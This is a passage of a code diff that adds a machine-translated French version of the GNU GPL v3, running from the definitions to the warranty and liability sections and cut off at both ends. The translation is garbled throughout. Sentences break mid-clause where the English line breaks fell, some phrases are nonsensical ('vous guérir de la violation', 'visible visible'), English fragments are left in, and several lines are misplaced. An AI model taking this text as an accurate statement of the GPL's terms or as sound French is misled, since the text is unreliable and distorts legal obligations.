\"vous\". \"Licenciés\" et\r\n+ \"destinataires\" peuvent être des individus ou des organisations.\r\n+\r\n+ \"Modifier\" une oeuvre signifie copier ou adapter tout ou partie de l'oeuvre\r\n+ d'une manière nécessitant une autorisation de droit d'auteur, autre que la réalisation d'un\r\n+ copie exacte. Le travail résultant est appelé une «version modifiée» de la\r\n+ un travail antérieur ou un travail \"basé sur\" le travail antérieur.\r\n+\r\n+ Un «travail couvert» désigne soit le programme non modifié, soit un programme basé sur le travail.\r\n+ sur le programme.\r\n+\r\n+ \"Propager\" un travail signifie faire n'importe quoi avec celui-ci, sans\r\n+ permission, vous rendrait directement ou indirectement responsable de\r\n+ contrefaçon en vertu du droit d'auteur applicable, sauf l'exécution sur une\r\n+ ordinateur ou en modifiant une copie privée. La propagation inclut la copie,\r\n+ distribution (avec ou sans modification), mise à la disposition du\r\n+ public et, dans certains pays, d'autres activités.\r\n+\r\n+ \"Transmettre\" une oeuvre signifie tout type de propagation qui permet aux autres\r\n+ les parties à faire ou recevoir des copies. Simple interaction avec un utilisateur via\r\n+ un réseau informatique, sans transfert de copie, ne transmet pas.\r\n+\r\n+ Une interface utilisateur interactive affiche \"Mentions légales appropriées\"\r\n+ dans la mesure où il comprend une pratique et visible visible\r\n+ fonctionnalité qui (1) affiche un avis de droit d'auteur approprié, et (2)\r\n+ indique à l'utilisateur qu'il n'y a pas de garantie pour le travail (sauf pour le\r\n+ mesure dans laquelle les garanties sont fournies), que les titulaires peuvent transmettre\r\n+ travailler sous cette licence, et comment voir une copie de cette licence. Si\r\n+ l'interface présente une liste de commandes ou d'options utilisateur, telles qu'un\r\n+ menu, un élément important de la liste répond à ce critère.\r\n+\r\n+ 1. Code source.\r\n+\r\n+ Le \"code source\" pour un travail signifie la forme préférée du travail\r\n+ pour y apporter des modifications. \"Code objet\" signifie toute non-source\r\n+ forme d'un travail.\r\n+\r\n+ Une \"interface standard\" désigne une interface qui est soit officielle\r\n+ norme définie par un organisme de normalisation reconnu ou, dans le cas de\r\n+ interfaces spécifiées pour un langage de programmation particulier, celui qui\r\n+ est largement utilisé par les développeurs travaillant dans cette langue.\r\n+\r\n+ Les \"Bibliothèques Système\" d'un travail exécutable incluent n'importe quoi, d'autres\r\n+ que le travail dans son ensemble, que (a) est inclus dans la forme normale de\r\n+ empaquetant un composant majeur, mais qui n'en fait pas partie\r\n+ Component, et (b) sert uniquement à permettre l'utilisation du travail avec\r\n+ Composant majeur, ou pour implémenter une interface standard pour laquelle un\r\n+ implémentation est disponible au public sous forme de code source. UNE\r\n+ \"Composante majeure\", dans ce contexte, signifie une composante essentielle majeure\r\n+ (noyau, système de fenêtrage, etc.) du système d'exploitation spécifique\r\n+ (le cas échéant) sur lequel le travail exécutable s'exécute, ou un compilateur utilisé pour\r\n+ produire le travail, ou un interpréteur de code objet utilisé pour l'exécuter.\r\n+\r\n+ La \"Source correspondante\" pour un travail sous forme de code objet signifie tous\r\n+ le code source nécessaire pour générer, installer et (pour un exécutable\r\n+ work) exécute le code objet et modifie le travail, y compris les scripts\r\n+ contrôlez ces activités. Cependant, il n'inclut pas le travail\r\n+ Bibliothèques système, ou des outils généraux ou généralement disponibles gratuitement\r\n+ programmes qui sont utilisés sans modification dans l'exécution de ces activités, mais\r\n+ qui ne font pas partie du travail. Par exemple, Source correspondante\r\n+ inclut les fichiers de définition d'interface associés aux fichiers sources pour\r\n+ le travail, et le code source pour les bibliothèques partagées et dynamiquement\r\n+ sous-programmes liés que le travail est spécifiquement conçu pour exiger,\r\n+ comme par la communication de données intime ou le flux de contrôle entre ceux\r\n+ sous-programmes et autres parties du travail.\r\n+\r\n+ La Source correspondante n'a pas besoin d'inclure quoi que ce soit que les utilisateurs\r\n+ peut se régénérer automatiquement à partir d'autres parties du\r\n+ Source.\r\n+\r\n+ La source correspondante pour un travail sous forme de code source est celle\r\n+ même travail.\r\n+\r\n+ 2. Autorisations de base.\r\n+\r\n+ Tous les droits accordés en vertu de cette licence sont accordés pour la durée de\r\n+ droit d'auteur sur le Programme, et sont irrévocables à condition que\r\n+ les conditions sont remplies. Cette Licence affirme explicitement votre illimité\r\n+ permission d'exécuter le programme non modifié. La sortie de l'exécution d'un\r\n+ le travail couvert est couvert par cette Licence seulement si la sortie, compte\r\n+ contenu, constitue un travail couvert. Cette licence reconnaît votre\r\n+ droits d'usage loyal ou autre équivalent, tel que prévu par la loi sur les droits d'auteur.\r\n+\r\n+ Vous pouvez créer, exécuter et propager des œuvres couvertes que vous n'avez pas\r\n+ transmettre, sans conditions tant que votre licence reste autrement\r\n+ en vigueur. Vous pouvez transmettre des œuvres couvertes à d'autres dans le seul but\r\n+ de les faire faire des modifications exclusivement pour vous, ou vous fournir\r\n+ avec des installations pour exécuter ces travaux, à condition que vous respectiez\r\n+ les termes de cette Licence dans le transport de tout le matériel pour lequel vous faites\r\n+ ne contrôle pas les droits d'auteur. Ceux qui fabriquent ou gèrent les œuvres couvertes\r\n+ car vous devez le faire exclusivement en votre nom, sous votre direction\r\n+ et contrôle, à des conditions qui leur interdisent de faire des copies de\r\n+ votre matériel protégé par des droits d'auteur en dehors de leur relation avec vous.\r\n+\r\n+ La transmission dans d'autres circonstances est autorisée uniquement\r\n+ les conditions énoncées ci-dessous. La sous-licence n'est pas autorisée. section 10\r\n+ le rend inutile.\r\n+\r\n+ 3. Protéger les droits légaux des utilisateurs contre la loi anticontournement.\r\n+\r\n+ Aucun travail couvert ne peut être considéré comme faisant partie d'un\r\n+ mesure en vertu de toute loi applicable remplissant les obligations en vertu de l'article\r\n+11 du traité de l'OMPI sur le droit d'auteur adopté le 20 décembre 1996, ou\r\n+ des lois similaires interdisant ou limitant le contournement de\r\n+ mesures.\r\n+\r\n+ Lorsque vous transmettez un travail couvert, vous renoncez à tout pouvoir légal d'interdire\r\n+ contournement des mesures techniques dans la mesure où un tel contournement\r\n+ est effectué en exerçant des droits en vertu de cette Licence en ce qui concerne:\r\n+ le travail couvert, et vous niez toute intention de limiter les opérations ou\r\n+ modification du travail comme moyen de faire respecter, contre le travail\r\n+ les utilisateurs, les droits légaux de vos tiers ou de tiers d'interdire le contournement\r\n+ mesures technologiques.\r\n+\r\n+ 4. Transmettre des copies verbatim.\r\n+\r\n+ Vous pouvez transmettre des copies textuelles du code source du programme lorsque vous\r\n+ le recevoir, sur n'importe quel support, à condition que vous le fassiez\r\n+ publier de façon appropriée sur chaque copie un avis de droit d'auteur approprié;\r\n+ garder intact tous les avis indiquant que cette Licence et tout\r\n+ les termes non permissifs ajoutés conformément à l'article 7 s'appliquent au code;\r\n+ garder intact tous les avis de l'absence de toute garantie; et donnez tout\r\n+ reçoit une copie de cette licence avec le programme.\r\n+\r\n+ Vous pouvez facturer n'importe quel prix ou aucun prix pour chaque copie que vous transmettez,\r\n+ et vous pouvez offrir une assistance ou une protection de garantie moyennant des frais.\r\n+\r\n+ 5. Transmettre des versions de sources modifiées.\r\n+\r\n+ Vous pouvez transmettre un travail basé sur le programme, ou les modifications à\r\n+ le produire à partir du programme, sous la forme d'un code source sous la\r\n+ les termes de la section 4, à condition que vous remplissiez également toutes les conditions suivantes:\r\n+\r\n+ a) Le travail doit porter des avis importants indiquant que vous avez modifié\r\n+ et donne une date pertinente.\r\n+\r\n+ b) Le travail doit porter des avis importants indiquant qu'il est\r\n+ publié sous cette licence et toutes les conditions ajoutées en vertu de la section\r\n+ 7. Cette exigence modifie l'exigence de la section 4 de\r\n+ \"garder intact tous les avis\".\r\n+\r\n+ c) Vous devez obtenir une licence pour l'ensemble du travail, dans son ensemble,\r\n+ Licence à toute personne qui entre en possession d'une copie. Ce\r\n+ La licence sera donc applicable, ainsi que tout article applicable 7\r\n+ termes supplémentaires, à l'ensemble du travail, et à toutes ses parties,\r\n+ indépendamment de la façon dont ils sont emballés. Cette licence ne donne pas\r\n+ permission d'autoriser le travail de toute autre manière, mais cela ne\r\n+ invalider une telle permission si vous l'avez reçu séparément.\r\n+\r\n+ d) Si le travail a des interfaces utilisateur interactives, chacun doit afficher\r\n+ Les avis juridiques appropriés; cependant, si le programme a une interaction\r\n+ interfaces qui n'affichent pas d'avis juridiques appropriés, votre\r\n+ le travail ne les oblige pas à le faire.\r\n+\r\n+ Une compilation d'un travail couvert avec d'autres séparés et indépendants\r\n+ œuvres, qui ne sont pas par nature des extensions du travail couvert,\r\n+ et qui ne sont pas combinés avec celui-ci pour former un programme plus grand,\r\n+ dans ou sur un volume d'un support de stockage ou de distribution, est appelé\r\n+ \"aggregate\" si la compilation et le copyright qui en résulte ne sont pas\r\n+ utilisé pour limiter l'accès ou les droits légaux des utilisateurs de la compilation\r\n+ au-delà de ce que les travaux individuels permettent. Inclusion d'un travail couvert\r\n+ dans un agrégat ne provoque pas l'application de cette Licence à l'autre\r\n+ parties de l'agrégat.\r\n+\r\n+ 6. Transmettre des formulaires non-source.\r\n+\r\n+ Vous pouvez transmettre un travail couvert sous forme de code objet sous les termes\r\n+ des articles 4 et 5, à condition que vous transmettiez\r\n+ Source Correspondante lisible par machine selon les termes de cette Licence,\r\n+ de l'une des façons suivantes:\r\n+\r\n+ a) Transmettre le code objet dans ou incorporé dans un produit physique\r\n+ (y compris un support physique de distribution), accompagné du\r\n+ Source correspondante fixée sur un support physique durable\r\n+ utilisé habituellement pour l'échange de logiciels.\r\n+\r\n+ b) Transmettre le code objet dans ou incorporé dans un produit physique\r\n+ (y compris un support de distribution physique), accompagné d'un\r\n+ offre écrite, valable pour au moins trois ans et valable pour\r\n+ longtemps que vous offrez des pièces de rechange ou un support client pour ce produit\r\n+ modèle, pour donner à quiconque possède le code objet soit (1) un\r\n+ copie de la source correspondante pour tous les logiciels de la\r\n+ produit couvert par cette licence, sur un support physique durable\r\n+ moyen habituellement utilisé pour l'échange de logiciels, pour un prix non\r\n+ plus que le coût raisonnable de l'exécution physique de cette\r\n+ acheminement de la source, ou (2) accès pour copier le\r\n+ Source correspondante d'un serveur de réseau sans frais.\r\n+\r\n+ c) Transmettre des copies individuelles du code objet avec une copie du\r\n+ offre écrite pour fournir la Source correspondante. Ce\r\n+ l'alternative n'est autorisée qu'occasionnellement et non commercialement, et\r\n+ seulement si vous avez reçu le code objet avec une telle offre, en accord\r\n+ avec la sous-section 6b.\r\n+\r\n+ d) Transmettre le code de l'objet en offrant l'accès à partir d'un\r\n+ lieu (gratuit ou payant), et offrir un accès équivalent au\r\n+ Source correspondante de la même manière au même endroit\r\n+ frais supplémentaires. Vous n'avez pas besoin de demander aux destinataires de copier\r\n+ Source correspondante avec le code objet. Si l'endroit à\r\n+ copier le code objet est un serveur réseau, la source correspondante\r\n+ peut être sur un serveur différent (exploité par vous ou un tiers)\r\n+ qui prend en charge des installations de copie équivalentes, à condition que vous mainteniez\r\n+ indications claires à côté du code objet indiquant où trouver le\r\n+ Source correspondante. Indépendamment de quel serveur héberge le\r\n+ Source correspondante, vous restez obligé de vous assurer qu'il est\r\n+ disponible aussi longtemps que nécessaire pour satisfaire ces exigences.\r\n+\r\n+ e) Transmettre le code d'objet en utilisant la transmission d'égal à égal, à condition\r\n+ vous informez les autres pairs où le code objet et le\r\n+ La source du travail est offerte au grand public sans\r\n+ accusation en vertu de la sous-section 6d.\r\n+\r\n+ Une partie séparable du code objet, dont le code source est exclu\r\n+ de la source correspondante en tant que bibliothèque système, ne doit pas être\r\n+ inclus dans la transmission du travail de code objet.\r\n+\r\n+ Un \"produit utilisateur\" est (1) soit un \"produit de consommation\", ce qui signifie\r\n+ biens personnels tangibles qui sont normalement utilisés pour le personnel, la famille,\r\n+ ou à des fins domestiques, ou (2) quelque chose conçu ou vendu pour la constitution\r\n+ dans une habitation. Pour déterminer si un produit est un produit de consommation,\r\n+ les cas douteux doivent être résolus en faveur de la couverture. Pour un particulier\r\n+ produit reçu par un utilisateur particulier, \"normalement utilisé\" se réfère à un\r\n+ utilisation typique ou commune de cette classe de produits, quel que soit le statut\r\n+ de l'utilisateur particulier ou de la façon dont l'utilisateur particulier\r\n+ utilise, ou s'attend à utiliser le produit. Un produit\r\n+ est un produit de consommation, que le produit ait ou non\r\n+ utilisations commerciales, industrielles ou non-consommatrices, sauf si ces utilisations\r\n+ le seul mode d'utilisation significatif du produit.\r\n+\r\n+ \"Informations d'installation\" pour un produit utilisateur signifie toutes les méthodes,\r\n+ procédures, clés d'autorisation ou autres informations requises pour l'installation\r\n+ et exécuter des versions modifiées d'un travail couvert dans ce produit utilisateur à partir de\r\n+ une version modifiée de sa source correspondante. L'information doit\r\n+ suffit pour assurer que le fonctionnement continu de l'objet modifié\r\nLe code + n'est en aucun cas empêché ou interféré uniquement parce que\r\n+ modification a été faite.\r\n+\r\n+ Si vous transmettez un code d'objet travaillez sous cette section dans, ou avec, ou\r\n+ spécifiquement pour une utilisation dans, un produit utilisateur, et le transport se produit comme\r\n+ partie d'une transaction dans laquelle le droit de possession et d'utilisation du\r\n+ Le produit de l'utilisateur est transféré au destinataire à perpétuité ou pour un\r\n+ terme fixe (quelle que soit la nature de la transaction), le\r\n+ La source correspondante transmise en vertu de cette section doit être accompagnée\r\n+ par les informations d'installation. Mais cette exigence ne s'applique pas\r\n+ si ni vous ni aucun tiers ne conserve la possibilité d'installer\r\n+ code objet modifié sur le produit utilisateur (par exemple, le travail a\r\n+ été installé dans ROM).\r\n+\r\n+ L'exigence de fournir des informations d'installation ne comprend pas\r\n+ obligation de continuer à fournir un service de support, une garantie ou des mises à jour\r\n+ pour un travail qui a été modifié ou installé par le destinataire, ou pour\r\n+ le produit utilisateur dans lequel il a été modifié ou installé. Accès à un\r\n+ réseau peut être refusée lorsque la modification elle-même matériellement et\r\n+ affecte négativement le fonctionnement du réseau ou viole les règles et\r\n+ protocoles pour la communication à travers le réseau.\r\n+\r\n+ Source correspondante transmise, et Informations d'installation fournies,\r\n+ en accord avec cette section doit être dans un format qui est publiquement\r\n+ documenté (et avec une mise à disposition disponible au public en\r\n+ code source), et ne doit pas nécessiter de mot de passe ou de clé\r\n+ déballage, lecture ou copie.\r\n+\r\n+ 7. Conditions supplémentaires.\r\n+\r\n+ \"Permissions supplémentaires\" sont des termes qui complètent les termes de cette\r\n+ Licence en faisant des exceptions d'une ou plusieurs de ses conditions.\r\n+ Les autorisations supplémentaires applicables à l'ensemble du programme doivent\r\n+ être traité comme s'ils étaient inclus dans cette Licence, dans la mesure où\r\n+ qu'ils sont valables en vertu de la loi applicable. Si des autorisations supplémentaires\r\n+ ne s'applique qu'à une partie du programme, cette partie peut être utilisée séparément\r\n+ sous ces autorisations, mais l'ensemble du programme reste régi par\r\n+ cette licence sans tenir compte des autorisations supplémentaires.\r\n+\r\n+ Lorsque vous transmettez une copie d'un travail couvert, vous pouvez à votre choix\r\n+ supprimer toutes les autorisations supplémentaires de cette copie, ou de toute partie de\r\n+ ça. (Des autorisations supplémentaires peuvent être écrites pour exiger leur propre\r\n+ suppression dans certains cas lorsque vous modifiez le travail.) Vous pouvez placer\r\n+ des permissions supplémentaires sur le matériel, ajoutées par vous à un travail couvert,\r\n+ pour lequel vous avez ou pouvez donner l'autorisation de droit d'auteur appropriée.\r\n+\r\n+ Nonobstant toute autre disposition de cette Licence, pour le matériel que vous\r\n+ ajouter à une œuvre couverte, vous pouvez (si autorisé par les titulaires de droits d'auteur de\r\n+ ce matériel) complètent les termes de cette Licence avec des termes:\r\n+\r\n+ a) Dégager une garantie ou limiter la responsabilité différemment de\r\n+ les termes des sections 15 et 16 de cette Licence; ou\r\n+\r\n+ b) Exiger la préservation des avis légaux raisonnables spécifiés ou\r\n+ les attributions de l'auteur dans ce document ou dans le\r\n+ Notices affichées par les œuvres qui le contiennent; ou\r\n+\r\n+ c) Interdisant la présentation inexacte de l'origine de ce matériel, ou\r\n+ exiger que les versions modifiées de ce matériel soient marquées\r\n+ des moyens raisonnables comme différents de la version originale; ou\r\n+\r\n+ d) Limiter l'utilisation à des fins publicitaires des noms des donneurs de licence ou\r\n+ les auteurs du matériel; ou\r\n+\r\n+ e) Refuser d'accorder des droits en vertu du droit des marques pour l'utilisation de\r\n+ les noms commerciaux, les marques de commerce ou les marques de service; ou\r\n+\r\n+ f) Exiger l'indemnisation des donneurs de licence et des auteurs de\r\n+ matériel par toute personne qui transmet le matériel (ou des versions modifiées de\r\n+ it) avec des hypothèses contractuelles de responsabilité envers le bénéficiaire,\r\n+ toute responsabilité que ces hypothèses contractuelles imposent directement à\r\n+ les concédants de licence et les auteurs.\r\n+\r\n+ Toutes les autres conditions supplémentaires non permissives sont considérées\r\n+ restrictions \"au sens de l'article 10. Si le programme\r\n+ reçu, ou une partie de celui-ci, contient un avis indiquant qu'il est\r\n+ régie par cette licence avec un terme qui est un autre\r\n+ restriction, vous pouvez supprimer ce terme. Si un document de licence contient\r\n+ une autre restriction, mais autorise le renouvellement de licence ou le transport sous cette\r\n+ Licence, vous pouvez ajouter à un matériel de travail couvert régi par les termes\r\n+ de ce document de licence, à condition que l'autre restriction\r\n+ ne pas survivre à un tel relicensing ou transport.\r\n+\r\n+ Si vous ajoutez des termes à un travail couvert en accord avec cette section, vous\r\n+ doit placer, dans les fichiers source pertinents, une déclaration du\r\n+ les termes supplémentaires qui s'appliquent à ces fichiers, ou un avis indiquant\r\n+ où trouver les termes applicables.\r\n+\r\n+ Des conditions supplémentaires, permissives ou non permissives, peuvent être énoncées dans le\r\n+ forme d'une licence écrite séparément, ou indiquée comme exceptions;\r\n+ les exigences ci-dessus s'appliquent de toute façon.\r\n+\r\n+ 8. Résiliation.\r\n+\r\n+ Vous ne pouvez pas propager ou modifier une œuvre couverte sauf comme expressément\r\n+ fourni sous cette licence. Toute tentative de propagation ou de propagation\r\n+ modifier est nul, et mettra automatiquement fin à vos droits sous\r\n+ cette Licence (y compris les licences de brevets accordées en vertu de la troisième\r\n+ paragraphe de la section 11).\r\n+\r\n+ Cependant, si vous cessez toute violation de cette Licence, alors votre\r\n+ la licence d'un détenteur de droit d'auteur particulier est rétablie\r\n+ provisoirement, à moins et jusqu'à ce que le détenteur des droits d'auteur\r\n+ met fin à votre licence, et (b) de manière permanente, si le copyright\r\n+ le titulaire ne vous informe pas de la violation par des moyens raisonnables\r\n+ avant 60 jours après la cessation.\r\n+\r\n+ De plus, votre licence d'un détenteur de copyright particulier est\r\n+ rétabli définitivement si le détenteur des droits d'auteur vous avertit\r\n+ violation par des moyens raisonnables, c'est la première fois que vous avez\r\n+ a reçu un avis de violation de cette Licence (pour tout travail) de cette\r\n+ titulaire du droit d'auteur, et vous guérir de la violation avant 30 jours après\r\n+ votre reçu de l'avis.\r\n+\r\n+ La résiliation de vos droits en vertu du présent article ne met pas fin au\r\n+ les licences des parties qui ont reçu des copies ou des droits de votre part\r\n+ cette licence. Si vos droits ont été résiliés et non définitivement\r\n+ rétabli, vous n'êtes pas qualifié pour recevoir de nouvelles licences pour le même\r\n+ matériel en vertu de l'article 10.\r\n+\r\n+ 9. Acceptation non requise pour avoir des copies.\r\n+\r\n+ Vous n'êtes pas obligé d'accepter cette licence pour recevoir ou\r\n+ exécuter une copie du programme. Propagation auxiliaire d'une œuvre couverte\r\n+ survenant uniquement à la suite de l'utilisation de la transmission d'égal à égal\r\n+ pour recevoir une copie ne nécessite pas non plus d'acceptation. cependant,\r\n+ rien d'autre que cette licence vous accorde la permission de propager ou\r\n+ modifier tout travail couvert. Ces actions enfreignent le droit d'auteur si vous le faites\r\n+ n'accepte pas cette licence. Par conséquent, en modifiant ou en propageant un\r\n+ travail couvert, vous indiquez votre acceptation de cette Licence pour le faire.\r\n+\r\n+ 10. Licence automatique des destinataires en aval.\r\n+\r\n+ Chaque fois que vous transmettez un travail couvert, le destinataire automatiquement\r\n+ reçoit une licence des concédants d'origine, pour exécuter, modifier et\r\n+ propager ce travail, sous réserve de cette licence. Vous n'êtes pas responsable\r\n+ pour faire respecter la conformité par des tiers avec cette licence.\r\n+\r\n+ Une \"transaction d'entité\" est une transaction transférant le contrôle d'un\r\n+ organisation, ou substantiellement tous les actifs d'un, ou en subdivisant\r\n+ organisation ou fusion d'organisations. Si la propagation d'un couvert\r\n+ travail résulte d'une transaction d'entité, chaque partie à cette transaction\r\n+ transaction qui reçoit une copie de l'œuvre reçoit également tout\r\n+ des licences pour le travail que le prédécesseur du parti a eu ou pourrait\r\n+ donner en vertu du paragraphe précédent, plus un droit de possession du\r\n+ Source correspondante du travail du prédécesseur en question, si\r\n+ le prédécesseur l'a ou peut l'obtenir avec des efforts raisonnables.\r\n+\r\n+ Vous ne pouvez imposer aucune restriction supplémentaire à l'exercice de\r\n+ droits accordés ou confirmés en vertu de cette licence. Par exemple, vous pouvez\r\n+ ne pas imposer de frais de licence, de redevances ou autres frais pour l'exercice de\r\n+ droits accordés en vertu de cette licence, et vous ne pouvez pas initier de litige\r\n+ (y compris une demande reconventionnelle ou reconventionnelle dans une action en justice) alléguant que\r\n+ toute revendication de brevet est violée en fabriquant, en utilisant, en vendant, en offrant\r\n+ vendre, ou importer le programme ou une partie de celui-ci.\r\n+\r\n+ 11. Brevets.\r\n+\r\n+ Un «contributeur» est un détenteur de droits d'auteur qui autorise l'utilisation sous cette\r\n+ Licence du programme ou un travail sur lequel le programme est basé. le\r\n+ Le travail ainsi autorisé est appelé \"version contributeur\" du contributeur.\r\n+\r\n+ Les «revendications de brevets essentiels» d'un contributeur sont toutes les revendications de brevet\r\n+ détenue ou contrôlée par le contributeur, qu'elle soit déjà acquise ou\r\n+ ci-après acquis, qui serait violé d'une certaine manière, permis\r\n+ par cette Licence, de faire, utiliser ou vendre sa version contributeur,\r\n+ mais n'incluent pas les réclamations qui ne seraient enfreintes que\r\n+ conséquence de la modification ultérieure de la version du contributeur. Pour\r\nAux fins de cette définition, «contrôle» comprend le droit d'accorder\r\n+ sous-licences de brevets d'une manière compatible avec les exigences de\r\n+ cette licence.\r\n+\r\n+ Chaque contributeur vous accorde une licence non exclusive, mondiale et libre de droits\r\n+ une licence de brevet en vertu des revendications de brevet essentielles du\r\n+ fabriquer, utiliser, vendre, mettre en vente, importer et exécuter, modifier et\r\n+ propager le contenu de sa version contributeur.\r\n+\r\n+ Dans les trois paragraphes suivants, une \"licence de brevet\" est une\r\n+ accord ou engagement, même dénommé, de ne pas faire respecter un brevet\r\n+ (comme une permission expresse de pratiquer un brevet ou un engagement de ne pas\r\n+ intenter une action en contrefaçon de brevet). Pour \"accorder\" une telle licence de\r\n+ partie signifie faire un tel accord ou engagement de ne pas appliquer un\r\n+ brevet contre la partie.\r\n+\r\n+ Si vous transmettez un travail couvert, en vous fondant sciemment sur une licence de brevet,\r\n+ et la Source correspondante du travail n'est disponible pour personne\r\n+ copier, gratuitement et selon les termes de cette Licence, par le biais d'un\r\n+ serveur de réseau accessible au public ou d'autres moyens facilement accessibles,\r\n+ alors vous devez soit (1) faire en sorte que la Source correspondante soit ainsi\r\n+ disponible, ou (2) prendre des dispositions pour vous priver du bénéfice de\r\n+ licence de brevet pour ce travail particulier, ou (3) organiser, d'une manière\r\n+ conforme aux exigences de cette licence, d'étendre le brevet\r\n+ licence aux destinataires en aval. \"En s'appuyant sciemment\" signifie que vous avez\r\n+ connaissance réelle que, mais pour la licence de brevet, votre transmettre le\r\n+ travail couvert dans un pays, ou l'utilisation par votre destinataire de l'œuvre couverte\r\n+ dans un pays, enfreindrait un ou plusieurs brevets identifiables dans cette\r\n+ pays que vous avez des raisons de croire sont valables.\r\n+\r\n+ Si, dans le cadre ou en relation avec une transaction unique ou\r\n+ arrangement, vous transmettez, ou propagez en procurant le transport d'un\r\n+ travail couvert, et accorder une licence de brevet à certaines des parties\r\n+ recevoir le travail couvert l'autorisant à utiliser, propager, modifier\r\n+ ou transmettre une copie spécifique de l'œuvre couverte, puis la licence de brevet\r\n+ vous accordez est automatiquement étendu à tous les destinataires de la couverture\r\n+ travaille et travaille en fonction de cela.\r\n+\r\n+ Une licence de brevet est \"discriminatoire\" si elle n'inclut pas\r\n+ l'étendue de sa couverture, interdit l'exercice de, ou est\r\n+ conditionné au non-exercice d'un ou de plusieurs droits qui sont\r\n+ spécifiquement accordé sous cette licence. Vous ne pouvez pas transmettre une couverture\r\n+ travailler si vous êtes partie à un arrangement avec un tiers qui est\r\n+ dans l'entreprise de distribution de logiciels, en vertu de laquelle vous effectuez le paiement\r\n+ à la tierce partie en fonction de l'étendue de votre activité de transport\r\n+ le travail, et en vertu duquel la tierce partie accorde, à l'un des\r\n+ parties qui recevraient le travail couvert de votre part, un discriminatoire\r\n+ licence de brevet (a) en relation avec des copies de l'œuvre couverte\r\n+ transmis par vous (ou des copies faites à partir de ces copies), ou (b) principalement\r\n+ pour et en relation avec des produits spécifiques ou des compilations\r\n+ contenir le travail couvert, sauf si vous avez conclu cet arrangement,\r\n+ ou cette licence de brevet a été accordée, avant le 28 mars 2007.\r\n+\r\n+ Rien dans cette Licence ne doit être interprété comme excluant ou limitant\r\n+ toute licence implicite ou autres moyens de défense à la contrefaçon\r\n+ autrement être à votre disposition en vertu du droit des brevets applicable.\r\n+\r\n+ 12. Pas de reddition de la liberté des autres.\r\n+\r\n+ Si des conditions vous sont imposées (que ce soit par ordonnance du tribunal, accord ou\r\n+ sinon) qui contredisent les conditions de cette Licence, ils ne le font pas\r\n+ vous excuser des conditions de cette licence. Si vous ne pouvez pas transmettre un\r\n+ travail couvert afin de satisfaire simultanément vos obligations dans le cadre de\r\n+ Licence et toute autre obligation pertinente, alors en conséquence vous pouvez\r\n+ ne pas le transmettre du tout. Par exemple, si vous acceptez les conditions qui vous obligent\r\n+ pour percevoir une redevance pour le transport ultérieur de ceux à qui vous transmettez\r\n+ le programme, la seule façon de satisfaire à la fois ces termes et\r\n+ La licence consisterait à s'abstenir entièrement de transmettre le programme.\r\n+\r\n+ 13. Utiliser avec la licence GNU Affero General Public.\r\n+\r\n+ Nonobstant toute autre disposition de cette Licence, vous avez\r\n+ permission de lier ou de combiner tout travail couvert avec un travail sous licence\r\n+ sous la version 3 de la GNU Affero General Public License en un seul\r\n+ travail combiné, et de transmettre le travail qui en résulte. Les termes de cette\r\n+ La licence continuera à s'appliquer à la partie qui est le travail couvert,\r\n+ mais les exigences particulières de la Licence Publique Générale GNU Affero,\r\n+ section 13, concernant l'interaction à travers un réseau s'appliquera à la\r\n+ combinaison en tant que telle.\r\n+\r\n+ 14. Versions révisées de cette licence.\r\n+\r\n+ La Free Software Foundation peut publier des versions révisées et / ou nouvelles de\r\n+ la licence publique générale GNU de temps en temps. Ces nouvelles versions seront\r\n+ être similaire dans l'esprit à la présente version, mais peut différer dans le détail à\r\n+ aborder de nouveaux problèmes ou préoccupations.\r\n+\r\n+ Chaque version reçoit un numéro de version distinctif. Si la\r\n+ Le programme spécifie qu'une certaine version numérotée du général GNU\r\n+ La licence publique \"ou toute version ultérieure\" s'applique à elle, vous avez la\r\n+ option de suivre les termes et conditions soit de ce numéroté\r\n+ version ou de toute version ultérieure publiée par le logiciel libre\r\n+ Fondation. Si le programme ne spécifie pas le numéro de version de\r\n+ GNU General Public License, vous pouvez choisir n'importe quelle version publiée\r\n+ par la Free Software Foundation.\r\n+\r\n+ Si le programme spécifie qu'un mandataire peut décider quel futur\r\n+ des versions de la GNU General Public License peuvent être utilisées, ce proxy\r\n+ une déclaration publique d'acceptation d'une version vous autorise en permanence\r\n+ choisir cette version pour le programme.\r\n+\r\n+ Les versions de licence ultérieures peuvent vous donner des fonctionnalités supplémentaires ou différentes\r\n+ permissions. Cependant, aucune obligation supplémentaire n'est imposée à\r\n+ auteur ou titulaire de droits d'auteur à la suite de votre choix de suivre\r\n+ version ultérieure\r\n+\r\n+ 15. Déni de garantie.\r\n+\r\n+ IL N'EXISTE AUCUNE GARANTIE POUR LE PROGRAMME, DANS LA MESURE PERMISE PAR\r\n+ LOI APPLICABLE. SAUF SI AUTREMENT EST ÉNONCÉ PAR ÉCRIT LE COPYRIGHT\r\n+ LES TITULAIRES ET / OU D'AUTRES PARTIES FOURNISSENT LE PROGRAMME \"TEL QUEL\" SANS GARANTIE\r\n+ D'AUCUNE SORTE, EXPRESSE OU IMPLICITE, Y COMPRIS, MAIS SANS S'Y LIMITER,\r\n+ LES GARANTIES IMPLICITES DE QUALITÉ MARCHANDE ET D'ADAPTATION À UN USAGE PARTICULIER\r\n+ BUT. L'ENSEMBLE DU RISQUE LIÉ À LA QUALITÉ ET À LA PERFORMANCE DU PROGRAMME\r\n+ EST AVEC VOUS. SI LE PROGRAMME S'AVÈRE DÉFECTUEUX, VOUS ASSUMEZ LE COÛT\r\n+ TOUT ENTRETIEN, RÉPARATION OU CORRECTION NÉCESSAIRE.\r\n+\r\n+ 16. Limitation de responsabilité.\r\n+\r\n+ EN AUCUN CAS SAUF SI REQUIS PAR LA LÉGISLATION APPLICABLE OU CONVENU PAR ÉCRIT\r\n+ EST-CE QU'UN TITULAIRE DU COPYRIGHT, OU TOUT AUTRE PARTI QUI MODIFIERA ET / OU TRANSMETTRA\r\n+ LE PROGRAMME TEL QUE PERMIS CI-DESSUS, SOIT RESPONSABLE ENVERS VOUS POUR LES DOMMAGES, Y COMPRIS TOUT\r\n+ DOMMAGES GÉNÉRAUX, SPÉCIAUX, ACCESSOIRES OU CONSÉCUTIFS RÉSULTANT DE LA\r\n+ UTILISATION OU INCAPACITÉ D'UTILISER LE PROGRAMME (Y COMPRIS, MAIS SANS S'Y LIMITER, LA PERTE DE\r\n+ DONNEES OU DONNEES RENDUES INEXACTEES OU PERTEES SOUTENUES PAR VOUS OU TROISIEME\r\n+ PARTIES OU ÉCHEC DU PROGRAMME D'EXPLOITATION AVEC D'AUTRES PROGRAMMES),\r\n+ MÊME SI CE TITULAIRE OU UNE AUTRE PARTIE A ÉTÉ AVISÉE DE LA POSSIBILITÉ DE\r\n+ DE TELS 